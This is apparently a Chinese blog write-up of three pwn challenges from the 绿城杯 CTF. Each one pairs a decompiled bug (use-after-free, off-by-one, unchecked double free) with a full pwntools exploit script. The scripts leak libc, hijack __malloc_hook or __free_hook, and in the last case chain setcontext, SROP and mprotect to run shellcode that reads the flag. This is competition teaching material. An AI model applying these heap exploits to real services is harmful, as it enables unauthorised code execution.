绿城杯pwn1-3

2021-09-30

Word count: 1.1k | Reading time≈ 6 min

=-=，不想评价这次的绿城，打过的话懂得都懂yue

uaf

void __fastcall sub_AC5(__int64 a1, int a2)
{
  if ( *(_QWORD *)(8LL * a2 + a1) )
    free(*(void **)(8LL * a2 + a1));
}

=-=uaf泄露libc直接打malloc

exp

from pwn import *
context.log_level = 'debug'

def add(size):
	p.sendlineafter(">",str(1))
	p.sendlineafter(">",str(size))
def delete(id):
	p.sendlineafter(">",str(2))
	p.sendlineafter(">",str(id))
def edit(id,content):
	p.sendlineafter(">",str(3))
	p.sendlineafter(">",str(id))	
	p.sendafter(">",content)
def show(id):
	p.sendlineafter(">",str(4))
	p.sendlineafter(">",str(id))

p = process("./uaf_pwn")
#p = remote("82.157.5.28",50702)
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
chunk_list = int(p.recv(14),16)
print "chunk_list:",hex(chunk_list)
add(0xf8)
add(0xf8)
delete(0)
add(0xf8)
show(0)
leak_addr = u64(p.recv(6).ljust(8,'\x00'))
print "leak_addr:",hex(leak_addr)
libc_base = leak_addr - (0x7ffff7dd1b78-0x7ffff7a0d000)
print "libc_base:",hex(libc_base)
malloc_hook = libc_base + libc.sym['__malloc_hook']-0x23
print "malloc_hook:",hex(malloc_hook)

for i in range(3):
	add(0x68)
delete(3)
delete(4)
delete(3)

add(0x68)
edit(6,p64(malloc_hook))
add(0x68)
edit(7,p64(malloc_hook))
add(0x68)
edit(8,p64(malloc_hook))
add(0x68)	#9
edit(9,'\x00'*0x13+p64(libc_base+0x4527a))

p.sendlineafter(">",str(1))
p.sendlineafter(">",str(0x68))


p.interactive()

null

off by one漏洞，直接当off bu null打就完事了，构造chunk overlap控制指针。

ssize_t __fastcall read_input(void *a1, __int64 a2)
{
  ssize_t result; // rax

  result = read(0, a1, a2 + 1);
  if ( (int)result <= 0 )
  {
    puts("Error");
    exit(0);
  }
  return result;
}

exp

from pwn import *
context.log_level = 'debug'

def add(id,size,content):
    p.sendlineafter(":",str(1))
    p.sendlineafter("Index:",str(id))
    p.sendlineafter("Heap :",str(size))
    p.sendafter("?:",content)
def delete(id):
    p.sendlineafter(":",str(2))
    p.sendlineafter("Index:",str(id))
def edit(id,content):
    p.sendlineafter(":",str(3))
    p.sendlineafter("Index:",str(id))
    p.sendafter("?:",content)
def show(id):
    p.sendlineafter(":",str(4))
    p.sendlineafter("Index :",str(id))



p = process("./null_pwn")
#p = remote("82.157.5.28",50804)
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")


add(0,0xf8,'a')
add(1,0x68,'a')
add(2,0xf8,'a')
add(3,0x68,'a') #protect

delete(0)
#gdb.attach(p)

add(0,0xf8,'\x78')
#gdb.attach(p)

show(0)
p.recvuntil("Content : ")
leak_addr = u64(p.recv(6).ljust(8,'\x00'))
print "leak_addr:",hex(leak_addr)
libc_base = leak_addr - (0x7fc7c3689b78-0x7fc7c32c5000)
print "libc_base:",hex(libc_base)
malloc_hook = libc_base + libc.sym['__malloc_hook']-0x23
print "malloc_hook:",hex(malloc_hook)

delete(0)
edit(1,'a'*0x60+p64(0x170)+'\x00')
gdb.attach(p)
delete(2)
gdb.attach(p)
add(0,0xf8,'a')
add(2,0x68,'a')    #1
add(4,0xf8,'a')

delete(1)
delete(3)
delete(2)

add(1,0x68,p64(malloc_hook))
add(2,0x68,p64(malloc_hook))
add(3,0x68,p64(malloc_hook))
add(5,0x68,'\x00'*0x13+p64(libc_base+0xf1247))

p.sendlineafter(":",str(1))
p.sendlineafter("Index:",str(9))
p.sendlineafter("Heap :",str(0x68))

p.interactive()

greentownnote

什么牛马缝合怪。。。。无聊题 uaf 问题开了沙盒，通用打法

unsigned __int64 sub_D19()
{
  int v1; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  printf("| Index :");
  __isoc99_scanf("%d", &v1);
  if ( v1 < 0 || v1 >= dword_20203C )
    exit(0);
  qword_202040 = (__int64)&unk_202060 + 16 * v1;
  free(*(void **)(qword_202040 + 8));
  *(_DWORD *)qword_202040 = 0;
  puts("| Success");
  return __readfsqword(0x28u) ^ v2;
}

可以看见对free的idx没做检测的都不确认下heaparry是不是有东西的

直接double free 他的2.27是很老的那种直接double 就行了，我的本机2.29笑死。

double控制free_hook写入setcontext+53再去传入mprotect的构造就行了

exp

from pwn import*

ip = "82.157.5.28"
port = 50601
r = remote(ip,port)
elf = ELF('./GreentownNote')
libc = ELF('./libc-2.27.so')
context(os='linux',arch='amd64')


def choice(c):
    r.recvuntil(":")
    r.sendline(str(c))

def add(size,content):
    choice(1)
    r.recvuntil(":")
    r.sendline(str(size))
    r.recvuntil(":")
    r.sendline(content)

def show(index):
    choice(2)
    r.recvuntil(":")
    r.sendline(str(index))

def free(index):
    choice(3)
    r.recvuntil(":")
    r.sendline(str(index))



add(0x100,b'AAAA')#0
add(0x100,b'')#1

free(0)
free(0)
show(0)

r.recvuntil("Content: ")
leak = u64(r.recv(6).ljust(8,b'\x00'))
heap_addr = leak - 0x260
success(hex(heap_addr))

add(0x100,p64(heap_addr+0x10))#0
add(0x100,'AAA')#2
add(0x100,'\x07'*0x40)#3-》0

free(3)
show(3)
leak = u64(r.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
libc_base = leak - 96 - 0x10 - libc.sym['__malloc_hook']
fh = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
setcontext = libc.sym['setcontext'] + libc_base +53
syscall = next(libc.search(asm("syscall\nret")))+libc_base
success(hex(leak))
success(hex(libc_base))
add(0x100,b'\x07'*0x80+p64(fh))
add(0x90,p64(setcontext))

fake_rsp = fh&0xfffffffffffff000
print(hex(fake_rsp))
frame = SigreturnFrame()
frame.rax=0
frame.rdi=0
frame.rsi=fake_rsp
frame.rdx=0x2000
frame.rsp=fake_rsp
frame.rip=syscall
print(len(frame))
add(0xf8,str(frame))
free(5)
prdi_ret = libc_base+libc.search(asm("pop rdi\nret")).next()
prsi_ret = libc_base+libc.search(asm("pop rsi\nret")).next()
prdx_ret = libc_base+libc.search(asm("pop rdx\nret")).next()
prax_ret = libc_base+libc.search(asm("pop rax\nret")).next()
jmp_rsp = libc_base+libc.search(asm("jmp rsp")).next()
mprotect_addr = libc_base + libc.sym['mprotect']


payload = p64(prdi_ret)+p64(fake_rsp)
payload += p64(prsi_ret)+p64(0x1000)
payload += p64(prdx_ret)+p64(7)
payload += p64(prax_ret)+p64(10)
payload += p64(syscall) #mprotect(fake_rsp,0x1000,7)
payload += p64(jmp_rsp)
payload += asm(shellcraft.open('./flag'))
payload += asm(shellcraft.read(3,fake_rsp+0x300,0x100))
payload += asm(shellcraft.write(1,fake_rsp+0x300,0x100))
r.sendline(payload)

r.interactive()

Copyright： Copyright is owned by the author. For commercial reprints, please contact the author for authorization. For non-commercial reprints, please indicate the source.